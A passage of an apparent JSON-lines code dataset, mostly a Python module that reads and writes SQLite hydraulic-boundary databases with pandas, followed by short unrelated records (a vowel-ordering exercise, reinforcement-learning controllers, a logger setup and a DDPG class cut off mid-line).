HRDInputVariables['InputVariableId'].array]]\n HydroDynamicInputData.columns = ['HydroDynamicDataId'] + HRDInputVariables['HRDInputColumnId'].tolist()\n HydroDynamicInputData.set_index('HydroDynamicDataId', inplace=True)\n HydroDynamicInputData = pd.DataFrame(HydroDynamicInputData.stack()).reset_index()\n HydroDynamicInputData.columns = ['HydroDynamicDataId', 'HRDInputColumnId', 'Value']\n # Add to database\n add_to_table('HydroDynamicInputData', HydroDynamicInputData, self.conn)\n\n # HydroDynamicResultData\n #-------------------------------------------------------------\n HRDResultVariables = pd.read_sql('SELECT * FROM HRDResultVariables;', self.conn)\n # Selecteer result data met algemene kolombenaming\n resultcolumns = ['HydroDynamicDataId'] + [resultvariableids[rvid] for rvid in HRDResultVariables['ResultVariableId'].array]\n #TODO: Make nice division bewteen zoet and zout\n if 'h' in resultcolumns and 'h' not in resultdata.columns:\n resultdata.rename(columns={'Water level': 'h'}, inplace=True)\n HydroDynamicResultData = resultdata[resultcolumns]\n\n # Converteer kolombenaming naar HRDResultColumnId\n HydroDynamicResultData.columns = ['HydroDynamicDataId'] + HRDResultVariables['HRDResultColumnId'].tolist()\n HydroDynamicResultData.set_index('HydroDynamicDataId', inplace=True)\n HydroDynamicResultData = pd.DataFrame(HydroDynamicResultData.stack()).reset_index()\n HydroDynamicResultData.columns = ['HydroDynamicDataId', 'HRDResultColumnId', 'Value']\n # Add to database\n add_to_table('HydroDynamicResultData', HydroDynamicResultData, self.conn)\n\n elif self.dbformat == 'OS2023':\n # For OS2023 only the HydroDynamicResultData table needs to be filled,\n # since the HydroDynamicData and HydroDynamicInputData are location independend\n HydroDynamicResultData = resultdata.set_index(['HRDLocationId', 'HydraulicLoadId'])\n \n # Convert resultvariables to id's\n result_var_conv = {v: k for k, v in self.conn.execute('SELECT HRDResultColumnId, ColumnName FROM HRDResultVariables;').fetchall() if v != 'ZWL'}\n HydroDynamicResultData = HydroDynamicResultData.loc[:, list(result_var_conv)].copy()\n HydroDynamicResultData.columns = [result_var_conv[var] for var in HydroDynamicResultData.columns]\n\n # Stack, add index to columns and rename columns\n HydroDynamicResultData = HydroDynamicResultData.stack().reset_index()\n HydroDynamicResultData.columns = ['HRDLocationId', 'HydraulicLoadId', 'HRDResultColumnId', 'Value']\n \n # Add to database\n add_to_table('HydroDynamicResultData', HydroDynamicResultData, self.conn)\n\n # Now the water levels (ZWL) have to be copied to the result locations\n zwl = pd.read_sql(f'SELECT HydraulicLoadId, HRDResultColumnId, Value FROM HydroDynamicResultData WHERE HRDLocationId={supportlocid} AND HRDResultColumnId=1;', con=self.conn)\n hrdlocationids = HydroDynamicResultData['HRDLocationId'].unique()\n zwl = pd.concat([zwl.assign(HRDLocationId=hrdid) for hrdid in hrdlocationids], ignore_index=True)\n add_to_table('HydroDynamicResultData', zwl, self.conn)\n\n\n else:\n raise ValueError('Format \"{}\" not understood.'.format(self.dbformat))\n\n self.conn.commit()\n self._close()\n\n def add_uncertainty_model_factor(self, locations, uncertainties):\n \"\"\"\n Export UncertaintyModelFactor to database\n\n Parameters\n ----------\n locations : geopandas.GeoDataFrame\n GeoDataFrame with data to export\n uncertainties : pandas.DataFrame\n Uncertainty data to be transformed and exported\n conn : sqlite3.connection\n Connection to HRD\n \"\"\"\n self._connect()\n # Select required 
locations from uncertainty data\n uncertainties = uncertainties.loc[locations['Naam'], :]\n # Replace name with HRDLocationId\n uncertainties.index = [locations.set_index('Naam').loc[name, 'HRDLocationId'] for name in uncertainties.index]\n # Convert column names\n uncertainties.columns = pd.MultiIndex.from_tuples([tuple(col.replace('mu', 'Mean').replace('sigma', 'Standarddeviation').split()) for col in uncertainties.columns])\n uncertainties = uncertainties.stack()\n # get closing situations id\n csids = np.stack(self.conn.execute('SELECT DISTINCT(ClosingSituationId) FROM ClosingSituations;').fetchall()).tolist()\n # Stack uncertainties dataframe for each ClosingSituationId\n if isinstance(csids, (int, np.int)):\n UncertaintyModelFactor = uncertainties.reset_index()\n UncertaintyModelFactor['ClosingSituationId'] = csids\n else:\n UncertaintyModelFactor = pd.concat([uncertainties]*len(csids)).reset_index()\n UncertaintyModelFactor['ClosingSituationId'] = np.repeat(csids, len(uncertainties))\n UncertaintyModelFactor.columns = ['HRDLocationId', 'HRDResultColumnId'] + UncertaintyModelFactor.columns[2:].tolist()\n # Replace HLCD names with HLCD id (HRDResultColumnId now contains the ResultVariableIds)\n UncertaintyModelFactor['HRDResultColumnId'].replace({v: k for k, v in resultvariableids.items()}, inplace=True)\n # Replace result variable ids with column ids\n HRDResultVariables = pd.read_sql('SELECT * FROM HRDResultVariables;', self.conn)\n # Create a dictionary to convert Result Variable Id to Result Column Id\n hlcdid_hrdcol_dict = HRDResultVariables.set_index('ResultVariableId')['HRDResultColumnId'].to_dict()\n # Select only the values in the table that are present in the HRDResultVariables keys.\n # Note that this is only needed when different database set-ups are combines in HB Havens\n UncertaintyModelFactor = UncertaintyModelFactor.loc[np.in1d(UncertaintyModelFactor['HRDResultColumnId'], list(hlcdid_hrdcol_dict.keys()))]\n # Replace (HRDResultColumnId now contains the HRDResultColumnId)\n UncertaintyModelFactor['HRDResultColumnId'].replace(hlcdid_hrdcol_dict, inplace=True)\n # Sort values\n UncertaintyModelFactor.sort_values(by=['HRDLocationId', 'ClosingSituationId', 'HRDResultColumnId'], inplace=True)\n # Add to database\n add_to_table('UncertaintyModelFactor', UncertaintyModelFactor, self.conn)\n self.conn.commit()\n self._close()\n\n def read_HydroDynamicData(self, hrdlocationid):\n \"\"\"\n Reads hydro dynamic data from database.\n Depending on the format of the database, this function uses for the\n function \"read_HydroDynamicData_2017\" for WBI2017 databases, and the\n function \"read_HydroDynamicData_2023\" for WBI2023 (pilot) databases. It\n thus first determines with which type we are dealing.\n\n Parameters\n ----------\n conn : sqlite3.connection\n Open connection to database\n hrdlocationid : integer\n integer with the locationid of the location\n \"\"\"\n\n self._connect()\n\n if self.dbformat == 'OS2023':\n data = self.read_HydroDynamicData_2023(hrdlocationid)\n elif self.dbformat == 'WBI2017':\n data = self.read_HydroDynamicData_2017(hrdlocationid)\n else:\n raise ValueError(f'Database \"{self.dbformat}\" format not known.')\n\n self._close()\n\n return data\n\n\n def read_HydroDynamicData_2017(self, hrdlocationid):\n \"\"\"\n Reads hydro dynamic data for a location (input and results)\n \"\"\"\n\n if not isinstance(hrdlocationid, (int, np.integer)):\n raise TypeError('must be int, not {}'.format(type(hrdlocationid)))\n\n # First collect the dataids. 
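        # Note: the queries in this method interpolate ids with str.format, which is
        # safe here only because hrdlocationid was just checked to be an int. For
        # untrusted values, sqlite3 and pandas support parameterized queries; a sketch
        # (loc_id is a hypothetical variable, not one defined in this module):
        #     pd.read_sql('SELECT ... WHERE HRDLocationId = ?;', self.conn,
        #                 params=(int(loc_id),))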
Also replace wind direction ids with real ids\n SQL = \"\"\"\n SELECT D.HydroDynamicDataId, D.ClosingSituationId, W.Direction AS \"Wind direction\"\n FROM\n HydroDynamicData D INNER JOIN HRDWindDirections W ON D.HRDWindDirectionId=W.HRDWindDirectionId\n WHERE HRDLocationId = {};\"\"\".format(int(hrdlocationid))\n\n dataids = pd.read_sql(SQL, self.conn, index_col='HydroDynamicDataId')\n dataidsstr = ','.join(dataids.index.values.astype(str).tolist())\n\n # Collect the result data. Replace HRDResultColumnId with variable id's\n SQL = \"\"\"\n SELECT RD.HydroDynamicDataId, RV.ResultVariableId, RD.Value\n FROM\n HydroDynamicResultData RD INNER JOIN HRDResultVariables RV ON RD.HRDResultColumnId = RV.HRDResultColumnId\n WHERE HydroDynamicDataId IN ({});\"\"\".format(dataidsstr)\n\n resultdata = pd.read_sql(SQL, self.conn, index_col=['HydroDynamicDataId', 'ResultVariableId']).unstack()\n # Reduce columnindex to single level index (without 'Value')\n resultdata.columns = [resultvariableids[rid] for rid in resultdata.columns.get_level_values(1)]\n \n # Collect inputdata in a similar way\n SQL = \"\"\"\n SELECT ID.HydroDynamicDataId, IV.InputVariableId, ID.Value\n FROM\n HydroDynamicInputData ID INNER JOIN HRDInputVariables IV ON ID.HRDInputColumnId = IV.HRDInputColumnId\n WHERE HydroDynamicDataId IN ({});\"\"\".format(dataidsstr)\n\n inputdata = pd.read_sql(SQL, self.conn, index_col=['HydroDynamicDataId', 'InputVariableId']).unstack()\n # Reduce columnindex to single level index (without 'Value')\n inputdata.columns = [inputvariableids[iid] for iid in inputdata.columns.get_level_values(1)]\n\n # Join data and sort values\n data = dataids.join(inputdata).join(resultdata)\n \n # Sort\n data.sort_values(by=dataids.columns.tolist() + inputdata.columns.tolist(), inplace=True)\n logger.info(f'Loaded hydraulic loads in WBI2017 format from {self.path}.')\n\n return data\n\n def read_HydroDynamicData_2023(self, hrdlocationid):\n \"\"\"\n Reads hydro dynamic data for a location (input and results) from a\n database with the WBI2023 format.\n \"\"\"\n\n if not isinstance(hrdlocationid, (int, np.integer)):\n raise TypeError('must be int, not {}'.format(type(hrdlocationid)))\n\n # First collect the dataids. Also replace wind direction ids with real ids\n SQL = \"\"\"\n SELECT D.HydraulicLoadId, D.ClosingSituationId, W.Direction AS \"Wind direction\"\n FROM\n HydroDynamicData D INNER JOIN HRDWindDirections W ON D.HRDWindDirectionId=W.HRDWindDirectionId;\"\"\"\n\n\n dataids = pd.read_sql(SQL, self.conn, index_col='HydraulicLoadId')\n dataidsstr = ','.join(dataids.index.drop_duplicates().values.astype(str).tolist())\n\n # Collect the result data. 
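        # Note: the reads below return long-format rows (one row per load/variable
        # pair), which .unstack() pivots to wide form, one column per result variable.
        # A tiny illustration of that pandas pattern with made-up values:
        #     long = pd.DataFrame({'id': [1, 1], 'var': [1, 2], 'Value': [0.5, 1.2]})
        #     long.set_index(['id', 'var']).unstack()
        # yields a single row with MultiIndex columns ('Value', 1) and ('Value', 2),
        # which is why the code flattens the column index right afterwards.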
Replace HRDResultColumnId with variable id's\n SQL = \"\"\"\n SELECT RD.HydraulicLoadId, RV.ResultVariableId, RD.Value\n FROM\n HydroDynamicResultData RD INNER JOIN HRDResultVariables RV ON RD.HRDResultColumnId = RV.HRDResultColumnId\n WHERE HydraulicLoadId IN ({}) AND HRDLocationId = {};\"\"\".format(dataidsstr, hrdlocationid)\n\n resultdata = pd.read_sql(SQL, self.conn, index_col=['HydraulicLoadId', 'ResultVariableId']).unstack()\n # Reduce columnindex to single level index (without 'Value')\n resultdata.columns = [resultvariableids[rid] for rid in resultdata.columns.get_level_values(1)]\n\n # Collect inputdata in a similar way\n SQL = \"\"\"\n SELECT ID.HydraulicLoadId, IV.InputVariableId, ID.Value\n FROM\n HydroDynamicInputData ID INNER JOIN HRDInputVariables IV ON ID.HRDInputColumnId = IV.HRDInputColumnId\n WHERE HydraulicLoadId IN ({});\"\"\".format(dataidsstr)\n\n inputdata = pd.read_sql(SQL, self.conn, index_col=['HydraulicLoadId', 'InputVariableId']).unstack()\n\n # Reduce columnindex to single level index (without 'Value')\n inputdata.columns = [inputvariableids[iid] for iid in inputdata.columns.get_level_values(1)]\n\n # Join data and sort values\n data = dataids.join(inputdata).join(resultdata).sort_values(by=['Wind direction', 'Wind speed', 'Water level'])\n\n # In the WBI2023 the water levels and waves are in the same table, but have different input variables\n # this gives empty columns in the loaded output, delete these.\n data.dropna(how='all', axis=1, inplace=True)\n \n # Drop entries without wave parameters\n data = data.loc[~np.isnan(resultdata['Hs'])]\n\n # Set the WBI2017 index name (HydroDynamicDataId) for consistency\n data.index.name = 'HydroDynamicDataId'\n logger.info(f'Loaded hydraulic loads in OS2023 format from {self.path}.')\n\n return data\n\n \n def read_HRDLocations(self):\n \"\"\"\n Reads locations from HRD and converts to geopandas.GeoDataFrame\n \"\"\"\n self._connect()\n\n # Retrieve locations\n loctable = pd.read_sql('SELECT HRDLocationId, XCoordinate, YCoordinate, Name FROM HRDLocations;', self.conn)\n # Create Point geometries\n ptgeometries = [Point(row.XCoordinate, row.YCoordinate) for row in loctable.itertuples()]\n # Construct new table\n locations = gpd.GeoDataFrame(loctable[['HRDLocationId', 'Name', 'XCoordinate', 'YCoordinate']], geometry=ptgeometries)\n locations.index = locations['HRDLocationId']\n\n self._close()\n\n return locations\n\n def read_UncertaintyModelFactor(self, hrdlocationid):\n \"\"\"\n Reads model uncertainties for a location from a database\n\n Parameters\n ----------\n hrdlocationid : int\n Location id of the location where the uncertainties are exported from\n \"\"\"\n\n if not isinstance(hrdlocationid, (int, np.integer)):\n raise TypeError('must be int, not {}'.format(type(hrdlocationid)))\n\n # First collect the dataids. 
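\n        # --- Illustration (not part of the original method) ---------------------\n        # read_HRDLocations above builds point geometries from plain XY columns.\n        # A self-contained sketch of that shapely/geopandas pattern with dummy data:\n        #\n        #     import geopandas as gpd\n        #     import pandas as pd\n        #     from shapely.geometry import Point\n        #     table = pd.DataFrame({'HRDLocationId': [1, 2],\n        #                           'XCoordinate': [1000.0, 1010.0],\n        #                           'YCoordinate': [2000.0, 2020.0]})\n        #     pts = [Point(row.XCoordinate, row.YCoordinate) for row in table.itertuples()]\n        #     locations = gpd.GeoDataFrame(table, geometry=pts)\n        #\n        # Setting 'HRDLocationId' as index afterwards, as done above, makes lookups\n        # by location id direct.\n        # -----------------------------------------------------------------------\n\n        # First collect the dataids. 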
Also replace wind direction ids with real ids\n SQL = \"\"\"\n SELECT\n U.ClosingSituationId, RV.ResultVariableId, U.Mean AS mu, U.Standarddeviation AS sigma\n FROM\n UncertaintyModelFactor U\n INNER JOIN\n HRDResultVariables RV\n ON\n U.HRDResultColumnId = RV.HRDResultColumnId\n WHERE\n U.HRDLocationId = {};\"\"\".format(hrdlocationid)\n\n # Read from database\n self._connect()\n modeluncertainty = pd.read_sql(SQL, self.conn, index_col=['ClosingSituationId', 'ResultVariableId'])\n\n # It is possible that the uncertainties vary per closing situation id\n # At the moment the maximum values are used.\n modeluncertainty = modeluncertainty.groupby(level=1).max()\n\n # Replace HRD result column ids\n modeluncertainty.index = [resultvariableids[iid] for iid in modeluncertainty.index.array]\n\n self._close()\n\n return modeluncertainty\n\n \n def check_element_presence(self, elements, column, table):\n \"\"\"\n Count the number of occurences of an element in a table\n \"\"\"\n if not isinstance(elements, list):\n raise TypeError('Unexpected type. Expected elements to be list.')\n \n self._connect()\n elementstr = ','.join(map(str, elements))\n sql = f'SELECT COUNT(*) FROM {table} WHERE {column} IN ({elementstr})'\n count = self.conn.execute(sql).fetchone()[0]\n self._close()\n\n return count\n\n\n\nclass HLCDio:\n\n def __init__(self, path):\n\n self.path = path\n if not os.path.exists(path):\n raise OSError(f'Path \"{path}\" does not exist.')\n\n self.conn = None\n \n def _connect(self):\n self.conn = sqlite3.connect(self.path)\n\n def _close(self):\n self.conn.close()\n\n def remove_locations(self, remove_ids):\n \"\"\"\n Remove locations from HLCD\n\n Parameters\n ----------\n remove_ids : list\n List with LocationIds to be removes from database, together with\n corresponding data.\n \"\"\"\n self._connect()\n \n # Get LocationIds to remove\n remove_id_str = \",\".join(map(str, remove_ids))\n sql = f'SELECT LocationId FROM Locations WHERE HRDLocationId IN ({remove_id_str});'\n remove_hlcd_ids = np.hstack(self.conn.execute(sql).fetchall())\n if not any(remove_hlcd_ids):\n self.conn.close()\n return None\n\n remove_id_str = ','.join(map(str, remove_hlcd_ids))\n sql = f'DELETE FROM Locations WHERE LocationId IN ({remove_id_str});'\n self.conn.execute(sql)\n self.conn.commit()\n self._close()\n\n return remove_hlcd_ids\n\n def get_max_hrdlocation_id(self, systemid=None, trackid=None):\n \"\"\"\n Function to prepare a HRDLocations table for export, from a geopandas\n GeoDataFrame\n\n Parameters\n ----------\n systemid : int\n Id of the water system\n trackid : int\n Id of track\n \"\"\"\n self._connect()\n\n if systemid is not None:\n # Determine the maximum HRDLocationId in the system\n maxlocid = self.conn.execute(\"\"\"\n SELECT MAX(HRDLocationId) FROM Locations WHERE (LocationId > ?) 
AND (LocationId < ?);\n \"\"\", (systemid*100000, (systemid+1)*100000)).fetchone()[0]\n\n if maxlocid is not None:\n descriptive_id = False\n self._close()\n return maxlocid, descriptive_id\n\n if trackid is not None:\n # If not max location ID is found, try looking for the maximum given the trackid\n maxlocid = self.conn.execute('SELECT MAX(HRDLocationId) FROM Locations WHERE TrackId=?;', (trackid,)).fetchone()[0]\n if maxlocid is not None:\n descriptive_id = True\n self._close()\n return maxlocid, descriptive_id\n\n # Else, just find the highest location id in the database\n maxlocid = self.conn.execute('SELECT MAX(HRDLocationId) FROM Locations;').fetchone()[0]\n descriptive_id = False\n self._close()\n \n return maxlocid, descriptive_id\n\n def get_max_location_id(self):\n \"\"\"\n Function to prepare a HRDLocations table for export, from a geopandas\n GeoDataFrame\n \"\"\"\n self._connect()\n maxlocid = self.conn.execute('SELECT MAX(LocationId) FROM Locations;').fetchone()[0]\n self._close()\n \n return maxlocid\n\n def check_element_presence(self, table, column, elements):\n \"\"\"\n Count the number of occurences of an element in a table\n \"\"\"\n if not isinstance(elements, list):\n raise TypeError('Unexpected type. Expected elements to be list.')\n \n self._connect()\n elementstr = ','.join(map(str, elements))\n sql = f'SELECT COUNT(*) FROM {table} WHERE {column} IN ({elementstr})'\n count = self.conn.execute(sql).fetchone()[0]\n self._close()\n\n return count\n\n def add_locations(self, result_locations):\n \"\"\"\n Modify the HLCD by removing old locations within the harbor and adding new\n locations. The HRD in needed for this function since it is used to determine\n the region.\n\n Parameters\n ----------\n result_locations : geopandas.GeoDataFrame\n GeoDataFrame with result locations\n conn : sqlite3.connection\n Connection to HLCD\n resultvariables : list\n List of result variables. 
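\n\n        Notes\n        -----\n        (Illustration, not in the original docstring.) LocationIds in the HLCD\n        are composed from the water system id followed by a five-digit location\n        number, which is why get_max_hrdlocation_id above searches the range\n        (systemid*100000, (systemid+1)*100000). For example, hypothetical values\n        systemid=3 and supportlocid=42 combine to::\n\n            int(f'{3:1d}{42:05d}')  # -> 300042, which lies in (300000, 400000)\n\n            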
Used for determining TypeOfHydraulicData\n \"\"\"\n \n result_loc_cols = ['LocationId', 'TypeOfHydraulicDataId', 'TrackId', 'HRDLocationId', 'InterpolationSupportId']\n if not set(result_locations.columns.tolist()).issuperset(set(result_loc_cols)):\n raise KeyError('Not all columns present to fill Location table.')\n \n Locations = pd.DataFrame(columns=[\n 'LocationId',\n 'TypeOfHydraulicDataId',\n 'TrackId',\n 'HRDLocationId',\n 'AreaNumber',\n 'InterpolationSupportId',\n 'ImplicInterpolationSupportId',\n 'ImplicPerformanceLevelSupportId'\n ])\n\n # Location ids\n Locations[result_loc_cols] = result_locations[result_loc_cols]\n\n # add to database\n self._connect()\n add_to_table('Locations', Locations, self.conn)\n self.conn.commit()\n self._close()\n\n def get_interpolation_support_id(self, systemid, supportlocid):\n\n self._connect()\n\n # find InterpolationSupportId in HLCD\n sql = f'SELECT InterpolationSupportId FROM Locations WHERE LocationId={systemid:1d}{supportlocid:05d};'\n interpolation_support_id = self.conn.execute(sql).fetchone()\n \n if interpolation_support_id is not None:\n interpolation_support_id = interpolation_support_id[0]\n\n self._close()\n\n return interpolation_support_id\n \n \n\nclass Configio:\n\n def __init__(self, path):\n\n self.path = path\n if not os.path.exists(path):\n raise OSError(f'Path \"{path}\" does not exist.')\n\n self.conn = None\n \n def _connect(self):\n self.conn = sqlite3.connect(self.path)\n\n def _close(self):\n self.conn.close()\n\n def remove_locations(self, remove_ids):\n \"\"\"\n Remove locations with corresponding calculation settings from config.\n\n Parameters\n ----------\n remove_ids : list\n List with LocationIds to be removes from database, together with\n corresponding data.\n \"\"\"\n\n remove_ids = ','.join(map(str, remove_ids))\n self._connect()\n self.conn.execute(f'DELETE FROM NumericsSettings WHERE LocationId IN ({remove_ids});')\n self.conn.execute(f'DELETE FROM TimeIntegrationSettings WHERE LocationID IN ({remove_ids});')\n self.conn.commit()\n self._close()\n \n def add_numerical_settings(self, locations):\n \"\"\"\n Add settings for numerics and time integration to config databasepath\n\n time integration\n calculationSchemeFBC = 1\n calculationSchemeAPT = 2\n --> calculationSchemeNTI = 3\n numerics\n methodFORM = 1\n methodCrudeMonteCarlo = 3\n methodDirectionalSampling = 4\n methodNumericalIntegration = 5\n methodImportanceSampling = 6\n methodFORMandDirSampling = 11\n --> methodDirSamplingWithFORMiterations = 12\n methodCrudeMonteCarloWithFORMiterations = 13\n methodImportanceSamplingWithFORMiterations = 14\n\n Parameters\n ----------\n locations : geopandas.GeoDataFrame\n GeoDataFrame with data to export\n conn : sqlite3.connection\n Connection to config\n \"\"\"\n\n self._connect()\n\n # Retrieve calculation settings for one location from database\n locationid = self.conn.execute('SELECT LocationId FROM NumericsSettings LIMIT 1;').fetchall()[0][0]\n NumericsSettings = pd.read_sql('SELECT * FROM NumericsSettings WHERE LocationId = {};'.format(locationid), self.conn)\n TimeIntegrationSettings = pd.read_sql('SELECT * FROM TimeIntegrationSettings WHERE LocationID = {};'.format(locationid), self.conn)\n\n # Set to heavy settings (methodDirSamplingWithFORMiterations and calculationSchemeNTI)\n NumericsSettings['CalculationMethod'] = 12\n TimeIntegrationSettings['TimeIntegrationSchemeID'] = 3\n\n # Stack for the number of locations to add\n length = len(NumericsSettings)\n NumericsSettings = 
pd.concat([NumericsSettings]*len(locations))\n NumericsSettings['LocationId'] = np.repeat(locations['LocationId'].squeeze().tolist(), length)\n add_to_table('NumericsSettings', NumericsSettings, self.conn)\n\n length = len(TimeIntegrationSettings)\n TimeIntegrationSettings = pd.concat([TimeIntegrationSettings]*len(locations))\n TimeIntegrationSettings['LocationID'] = np.repeat(locations['LocationId'].squeeze().tolist(), length)\n add_to_table('TimeIntegrationSettings', TimeIntegrationSettings, self.conn)\n\n self.conn.commit()\n\n self._close()\n","sub_path":"hbhavens/io/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":39946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"97206484","text":"\n\nfrom xai.brain.wordbase.nouns._quarantine import _QUARANTINE\n\n#calss header\nclass _QUARANTINES(_QUARANTINE, ):\n\tdef __init__(self,): \n\t\t_QUARANTINE.__init__(self)\n\t\tself.name = \"QUARANTINES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"quarantine\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_quarantines.py","file_name":"_quarantines.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"112654032","text":"import numpy as np\nfrom cost_functions import trajectory_cost_fn\nimport time\n\nclass Controller():\n def __init__(self):\n pass\n\n # Get the appropriate action(s) for this state(s)\n def get_action(self, state):\n pass\n\n\nclass RandomController(Controller):\n def __init__(self, env):\n \"\"\" YOUR CODE HERE \"\"\"\n self.env = env\n\n def get_action(self, state):\n \"\"\" YOUR CODE HERE \"\"\"\n \"\"\" Your code should randomly sample an action uniformly from the action space \"\"\"\n return self.env.action_space.sample()\n\nclass MPCcontroller(Controller):\n \"\"\" Controller built using the MPC method outlined in https://arxiv.org/abs/1708.02596 \"\"\"\n def __init__(self,\n env,\n dyn_model,\n horizon=5,\n cost_fn=None,\n num_simulated_paths=10,\n ):\n self.env = env\n self.dyn_model = dyn_model\n self.horizon = horizon\n self.cost_fn = cost_fn\n self.num_simulated_paths = num_simulated_paths\n num_action_candidates = self.num_simulated_paths*self.horizon\n self.action_candidates = np.array([self.env.action_space.sample() for i in range(num_action_candidates)]) # (num, action_dim)\n\n def get_action(self, state):\n \"\"\" YOUR CODE HERE \"\"\"\n \"\"\" Note: be careful to batch your simulations through the model for speed \"\"\"\n obs = state*np.ones((self.num_simulated_paths, state.shape[0])) # (paths, obs_dim)\n observations = [] # [(paths, obs_dim), ...]\n actions = [] # [(paths, action_dim), ...]\n next_observations = [] # [(paths, obs_dim), ...]\n\n for i in range(self.horizon):\n # sample from action candidates (instead of calling env.action_space.sample() every iteration)\n random_idx = np.random.choice(self.action_candidates.shape[0], obs.shape[0], replace=False)\n action = self.action_candidates[random_idx]\n #action = np.array([self.env.action_space.sample() for i in range(self.num_simulated_paths)])\n observations += [obs]\n actions += [action]\n obs = self.dyn_model.predict(obs, action)\n next_observations += [obs]\n\n costs = trajectory_cost_fn(self.cost_fn, observations, actions, next_observations) # (paths, )\n\n return 
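actions[0][np.argmin(costs)]\n\n# --- Illustration (not part of the original controller) -----------------------\n# The MPC controller above does random shooting: it simulates num_simulated_paths\n# action sequences through the learned dynamics model, scores every rollout with\n# trajectory_cost_fn, and returns the first action of the cheapest rollout. The\n# selection step in isolation, with made-up numbers:\n#\n#     import numpy as np\n#     costs = np.array([3.2, 1.7, 2.9])                 # one cost per simulated path\n#     first_actions = np.array([[0.1], [-0.4], [0.8]])  # actions[0], one row per path\n#     best = first_actions[np.argmin(costs)]            # -> array([-0.4])\n# ------------------------------------------------------------------------------\n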
","sub_path":"hw4/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"161256569","text":"import logging\nimport logging.config\nimport sys\n\nFORMATTER = logging.Formatter(\"[%(levelname)s]: [%(asctime)s] [%(lineno)d] [%(filename)s] [%(message)s]\")\nLOG_FILE = \"service.log\"\n\n\ndef get_console_handler():\n    console_handler = logging.StreamHandler(sys.stdout)\n    console_handler.setFormatter(FORMATTER)\n    console_handler.setLevel(logging.INFO)\n    return console_handler\n\n\n# def get_file_handler():\n#     file_handler = TimedRotatingFileHandler(LOG_FILE)\n#     file_handler.setFormatter(FORMATTER)\n#     file_handler.setLevel(logging.INFO)\n#     return file_handler\n\n\ndef set_up_logging():\n    logger = logging.getLogger(__name__)\n    if not logger.hasHandlers():\n        logger.setLevel(logging.DEBUG)\n        logger.addHandler(get_console_handler())\n        # logger.addHandler(get_file_handler())\n    logger.propagate = False\n    return logger\n","sub_path":"src/main_logger.py","file_name":"main_logger.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"245785267","text":"def ordered_vowel_words(string):\n    words = string.split()\n    unordered_vowels_list = []\n    for word in words:\n        vowel_list = []\n        for letter in word:\n            if letter in \"aeoui\":\n                vowel_list.append(letter)\n        for num in range(1, len(vowel_list)):\n            if vowel_list[num] < vowel_list[num - 1]:\n                unordered_vowels_list.append(word)\n                break\n    newList = []\n    for word in words:\n        if word not in unordered_vowels_list:\n            newList.append(word)\n\n    # The spec below expects a string, not a list, so join the kept words\n    return \" \".join(newList)\n
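\n# A couple of sanity checks matching the spec below (doctest-style illustration):\n#\n#     >>> ordered_vowel_words(\"amends\")\n#     'amends'\n#     >>> ordered_vowel_words(\"complicated\")\n#     ''\n#     >>> ordered_vowel_words(\"this is a test of the vowel ordering system\")\n#     'this is a test of the system'\n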
\"\"\"\nrequire '03_ordered_vowels'\nrequire 'rspec'\n\n# Write a method, `ordered_vowel_words(str)` that takes a string of\n# lowercase words and returns a string with just the words containing\n# all their vowels (excluding \"y\") in alphabetical order. Vowels may\n# be repeated (`\"afoot\"` is an ordered vowel word).\n#\n# You will probably want a helper method, `ordered_vowel_word?(word)`\n# which returns true/false if a word's vowels are ordered.\n#\n# Difficulty: 2/5\n\ndescribe \"#ordered_vowel_words\" do\n  it \"returns a word that is in order\" do\n    ordered_vowel_words(\"amends\").should == \"amends\"\n  end\n\n  it \"does not return a word that is not in order\" do\n    ordered_vowel_words(\"complicated\").should == \"\"\n  end\n\n  it \"handles double vowels\" do\n    ordered_vowel_words(\"afoot\").should == \"afoot\"\n  end\n\n  it \"handles a word with a single vowel\" do\n    ordered_vowel_words(\"ham\").should == \"ham\"\n  end\n\n  it \"handles a word with no vowel\" do\n    ordered_vowel_words(\"crypt\").should == \"crypt\"\n  end\n\n  it \"handles a word with a single letter\" do\n    ordered_vowel_words(\"o\").should == \"o\"\n  end\n\n  it \"ignores the letter y\" do\n    ordered_vowel_words(\"tamely\").should == \"tamely\"\n  end\n\n  it \"processes a string with several words\" do\n    phrase = \"this is a test of the vowel ordering system\"\n    result = \"this is a test of the system\"\n\n    ordered_vowel_words(phrase).should == result\n  end\nend\n\"\"\"","sub_path":"Python/App Academy Exercise/practice-problems2/my solutions in python/03_ordered_vowels_spec.py","file_name":"03_ordered_vowels_spec.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"291795153","text":"import numpy as np\nfrom pg_utils import *\nimport tensorflow as tf\nimport gym\nimport logz\nimport time\nimport inspect\nfrom memory import Memory\nimport os\n\n#todo add action_noise\n#todo add every normalize denormalize\n#todo mpi, optimizer minimize to grad and update, for mpi\n\nclass DDPG(object):\n    def setup_placeholders(self):\n        # placeholders\n        # Prefixes and suffixes:\n        # ob - observation\n        # ac - action\n        # _no - this tensor should have shape (batch size /n/, observation dim)\n        # _na - this tensor should have shape (batch size /n/, action dim)\n        # _n - this tensor should have shape (batch size /n/)\n        # Prefixing every placeholder name with 'sy_' is good practice: it makes\n        # placeholders easy to tell apart from variables later on\n        self.sy_ob_no = tf.placeholder(tf.float32, shape=[None, self.ob_dim], name=\"ob\")\n        self.sy_ob_next = tf.placeholder(tf.float32, shape=[None, self.ob_dim], name=\"ob_next\")\n        self.terminal_next = tf.placeholder(tf.float32, shape=[None, 1], name=\"terminal_next\")\n        self.sy_rewards = tf.placeholder(tf.float32, shape=[None, 1], name=\"sy_rewards\")\n        self.sy_critic_targets = tf.placeholder(tf.float32, shape=[None, 1], name=\"sy_critic_targets\")\n        self.param_noise_stddev = tf.placeholder(tf.float32, shape=(), name='param_noise_stddev')\n        # The actions placeholder holds the probability over all actions, not just\n        # a single selected action\n        # tensorforce implements it the same way, so the input should also be probabilities:\n        # x_actions = tf.reshape(tf.cast(x_actions, 